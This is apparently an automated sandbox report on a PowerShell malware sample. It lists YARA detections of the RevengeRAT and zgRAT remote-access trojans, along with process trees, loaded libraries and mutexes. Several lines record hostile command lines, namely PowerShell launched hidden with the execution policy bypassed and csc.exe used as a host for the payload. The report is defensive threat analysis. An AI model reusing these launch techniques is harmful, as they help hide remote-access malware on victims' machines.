                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: classification engine | Classification label: mal100.troj.evad.winPS1@20/13@2/3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Mutant created: \Sessions\1\BaseNamedObjects\pHXJvbCGPPiC
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3iqdlbf.ikw.ps1
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: stage2.ps1 | Virustotal: Detection: 12%
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: Binary string: C:\Users\pc\Desktop\RevengeRAT C# Stub\Lime\obj\Debug\Lime.pdb source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp
